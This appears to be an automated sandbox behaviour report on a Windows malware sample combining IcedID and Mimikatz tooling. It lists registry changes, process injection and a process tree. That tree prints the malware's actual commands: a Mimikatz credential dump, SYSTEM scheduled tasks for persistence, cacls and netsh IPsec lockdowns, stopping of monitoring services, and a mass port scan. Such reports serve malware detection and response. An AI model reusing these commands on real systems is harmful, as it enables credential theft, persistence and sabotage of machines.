\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gzlqlcb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bqpfqegdw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ynqpazbis.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gzlqlcb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-09-28_884b10fd1f9390f450ae7e4a04e7e602_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcllcg.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2952 cmd.exe 2496 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000800000002347a-6.dat nsis_installer_2 behavioral2/files/0x000200000001e38b-14.dat nsis_installer_1 behavioral2/files/0x000200000001e38b-14.dat nsis_installer_2 -
Modifies data under HKEY_USERS 41 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" gzlqlcb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals bbdqsyfub.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bbdqsyfub.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bbdqsyfub.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bbdqsyfub.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bbdqsyfub.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bbdqsyfub.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bbdqsyfub.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing gzlqlcb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" gzlqlcb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bbdqsyfub.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bbdqsyfub.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing bbdqsyfub.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bbdqsyfub.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bbdqsyfub.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bbdqsyfub.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bbdqsyfub.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ gzlqlcb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" gzlqlcb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bbdqsyfub.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bbdqsyfub.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bbdqsyfub.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" gzlqlcb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bbdqsyfub.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bbdqsyfub.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bbdqsyfub.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bbdqsyfub.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bbdqsyfub.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bbdqsyfub.exe Key created \REGISTRY\USER\.DEFAULT\Software bbdqsyfub.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bbdqsyfub.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bbdqsyfub.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bbdqsyfub.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bbdqsyfub.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bbdqsyfub.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bbdqsyfub.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bbdqsyfub.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bbdqsyfub.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bbdqsyfub.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bbdqsyfub.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bbdqsyfub.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" gzlqlcb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" gzlqlcb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ gzlqlcb.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2496 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4424 schtasks.exe 1516 schtasks.exe 4876 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3828 2024-09-28_884b10fd1f9390f450ae7e4a04e7e602_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 3828 2024-09-28_884b10fd1f9390f450ae7e4a04e7e602_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3792 gzlqlcb.exe Token: SeDebugPrivilege 3420 gzlqlcb.exe Token: SeDebugPrivilege 1780 vfshost.exe Token: SeDebugPrivilege 4744 bbdqsyfub.exe Token: SeLockMemoryPrivilege 3612 ftfrpi.exe Token: SeLockMemoryPrivilege 3612 ftfrpi.exe Token: SeDebugPrivilege 4076 bbdqsyfub.exe Token: SeDebugPrivilege 2128 bbdqsyfub.exe Token: SeDebugPrivilege 1880 bbdqsyfub.exe Token: SeDebugPrivilege 1848 bbdqsyfub.exe Token: SeDebugPrivilege 1264 bbdqsyfub.exe Token: SeDebugPrivilege 4500 bbdqsyfub.exe Token: SeDebugPrivilege 4296 bbdqsyfub.exe Token: SeDebugPrivilege 4860 bbdqsyfub.exe Token: SeDebugPrivilege 1436 bbdqsyfub.exe Token: SeDebugPrivilege 3760 bbdqsyfub.exe Token: SeDebugPrivilege 1928 bbdqsyfub.exe Token: SeDebugPrivilege 2632 bbdqsyfub.exe Token: SeDebugPrivilege 3340 bbdqsyfub.exe Token: SeDebugPrivilege 4124 bbdqsyfub.exe Token: SeDebugPrivilege 3132 bbdqsyfub.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 3828 2024-09-28_884b10fd1f9390f450ae7e4a04e7e602_hacktools_icedid_mimikatz.exe 3828 2024-09-28_884b10fd1f9390f450ae7e4a04e7e602_hacktools_icedid_mimikatz.exe 3792 gzlqlcb.exe 3792 gzlqlcb.exe 3420 gzlqlcb.exe 3420 gzlqlcb.exe 4472 xohudmc.exe 4436 xcllcg.exe 2224 gzlqlcb.exe 2224 gzlqlcb.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3828 wrote to memory of 2952 3828 2024-09-28_884b10fd1f9390f450ae7e4a04e7e602_hacktools_icedid_mimikatz.exe 84 PID 3828 wrote to memory of 2952 3828 2024-09-28_884b10fd1f9390f450ae7e4a04e7e602_hacktools_icedid_mimikatz.exe 84 PID 3828 wrote to memory of 2952 3828 2024-09-28_884b10fd1f9390f450ae7e4a04e7e602_hacktools_icedid_mimikatz.exe 84 PID 2952 wrote to memory of 2496 2952 cmd.exe 86 PID 2952 wrote to memory of 2496 2952 cmd.exe 86 PID 2952 wrote to memory of 2496 2952 cmd.exe 86 PID 2952 wrote to memory of 3792 2952 cmd.exe 91 PID 2952 wrote to memory of 3792 2952 cmd.exe 91 PID 2952 wrote to memory of 3792 2952 cmd.exe 91 PID 3420 wrote to memory of 1996 3420 gzlqlcb.exe 93 PID 3420 wrote to memory of 1996 3420 gzlqlcb.exe 93 PID 3420 wrote to memory of 1996 3420 gzlqlcb.exe 93 PID 1996 wrote to memory of 1512 1996 cmd.exe 95 PID 1996 wrote to memory of 1512 1996 cmd.exe 95 PID 1996 wrote to memory of 1512 1996 cmd.exe 95 PID 1996 wrote to memory of 2024 1996 cmd.exe 96 PID 1996 wrote to memory of 2024 1996 cmd.exe 96 PID 1996 wrote to memory of 2024 1996 cmd.exe 96 PID 1996 wrote to memory of 1400 1996 cmd.exe 97 PID 1996 wrote to memory of 1400 1996 cmd.exe 97 PID 1996 wrote to memory of 1400 1996 cmd.exe 97 PID 1996 wrote to memory of 2440 1996 cmd.exe 98 PID 1996 wrote to memory of 2440 1996 cmd.exe 98 PID 1996 wrote to memory of 2440 1996 cmd.exe 98 PID 1996 wrote to memory of 4672 1996 cmd.exe 99 PID 1996 wrote to memory of 4672 1996 cmd.exe 99 PID 1996 wrote to memory of 4672 1996 cmd.exe 99 PID 1996 wrote to memory of 3408 1996 cmd.exe 100 PID 1996 wrote to memory of 3408 1996 cmd.exe 100 PID 1996 wrote to memory of 3408 1996 cmd.exe 100 PID 3420 wrote to memory of 1476 3420 gzlqlcb.exe 104 PID 3420 wrote to memory of 1476 3420 gzlqlcb.exe 104 PID 3420 wrote to memory of 1476 3420 gzlqlcb.exe 104 PID 3420 wrote to memory of 856 3420 gzlqlcb.exe 106 PID 3420 wrote to memory of 856 3420 gzlqlcb.exe 106 PID 3420 wrote to memory of 856 3420 gzlqlcb.exe 106 PID 3420 wrote to memory of 2696 3420 gzlqlcb.exe 108 PID 3420 wrote to memory of 2696 3420 gzlqlcb.exe 108 PID 3420 wrote to memory of 2696 3420 gzlqlcb.exe 108 PID 3420 wrote to memory of 4288 3420 gzlqlcb.exe 112 PID 3420 wrote to memory of 4288 3420 gzlqlcb.exe 112 PID 3420 wrote to memory of 4288 3420 gzlqlcb.exe 112 PID 4288 wrote to memory of 4808 4288 cmd.exe 114 PID 4288 wrote to memory of 4808 4288 cmd.exe 114 PID 4288 wrote to memory of 4808 4288 cmd.exe 114 PID 4808 wrote to memory of 3048 4808 wpcap.exe 115 PID 4808 wrote to memory of 3048 4808 wpcap.exe 115 PID 4808 wrote to memory of 3048 4808 wpcap.exe 115 PID 3048 wrote to memory of 1524 3048 net.exe 117 PID 3048 wrote to memory of 1524 3048 net.exe 117 PID 3048 wrote to memory of 1524 3048 net.exe 117 PID 4808 wrote to memory of 4592 4808 wpcap.exe 118 PID 4808 wrote to memory of 4592 4808 wpcap.exe 118 PID 4808 wrote to memory of 4592 4808 wpcap.exe 118 PID 4592 wrote to memory of 1124 4592 net.exe 120 PID 4592 wrote to memory of 1124 4592 net.exe 120 PID 4592 wrote to memory of 1124 4592 net.exe 120 PID 4808 wrote to memory of 2156 4808 wpcap.exe 121 PID 4808 wrote to memory of 2156 4808 wpcap.exe 121 PID 4808 wrote to memory of 2156 4808 wpcap.exe 121 PID 2156 wrote to memory of 1500 2156 net.exe 123 PID 2156 wrote to memory of 1500 2156 net.exe 123 PID 2156 wrote to memory of 1500 2156 net.exe 123 PID 4808 wrote to memory of 2136 4808 wpcap.exe 124
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2252
-
C:\Windows\TEMP\uczqnfqby\ftfrpi.exe"C:\Windows\TEMP\uczqnfqby\ftfrpi.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3612
-
-
C:\Users\Admin\AppData\Local\Temp\2024-09-28_884b10fd1f9390f450ae7e4a04e7e602_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-09-28_884b10fd1f9390f450ae7e4a04e7e602_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3828 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ibcutqwu\gzlqlcb.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2496
-
-
C:\Windows\ibcutqwu\gzlqlcb.exeC:\Windows\ibcutqwu\gzlqlcb.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3792
-
-
-
C:\Windows\ibcutqwu\gzlqlcb.exeC:\Windows\ibcutqwu\gzlqlcb.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3420 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1512
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:2024
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1400
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:2440
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4672
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:3408
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1476
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:856
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2696
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\eqbflpvll\cqzqykzwz\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4288 -
C:\Windows\eqbflpvll\cqzqykzwz\wpcap.exeC:\Windows\eqbflpvll\cqzqykzwz\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1524
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:1124
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:1500
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:2136 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:3828
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4704 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:5020
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3044
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4924 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1612 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1512
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\eqbflpvll\cqzqykzwz\bqpfqegdw.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\eqbflpvll\cqzqykzwz\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:2640 -
C:\Windows\eqbflpvll\cqzqykzwz\bqpfqegdw.exeC:\Windows\eqbflpvll\cqzqykzwz\bqpfqegdw.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\eqbflpvll\cqzqykzwz\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\eqbflpvll\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\eqbflpvll\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2524 -
C:\Windows\eqbflpvll\Corporate\vfshost.exeC:\Windows\eqbflpvll\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "sbcsldepb" /ru system /tr "cmd /c C:\Windows\ime\gzlqlcb.exe"2⤵
- System Location Discovery: System Language Discovery
PID:456 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2388
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "sbcsldepb" /ru system /tr "cmd /c C:\Windows\ime\gzlqlcb.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zsciiyqsz" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ibcutqwu\gzlqlcb.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:732 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "zsciiyqsz" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ibcutqwu\gzlqlcb.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4424
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nzctfewsb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\uczqnfqby\ftfrpi.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:3364 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3128
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "nzctfewsb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\uczqnfqby\ftfrpi.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4876
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1440
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4528
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:208
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
